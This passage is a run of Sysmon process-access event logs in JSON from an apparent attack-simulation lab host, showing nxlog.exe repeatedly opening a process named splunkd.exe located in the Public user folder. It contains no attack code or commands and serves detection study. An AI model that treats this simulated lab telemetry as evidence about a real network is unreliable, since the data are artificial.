(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:47.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6660,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:48.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:48.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6661,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:49.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:49.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6662,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:50.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:50.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6663,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:51.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:51.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6664,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:52.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:52.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6665,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:53.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:53.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
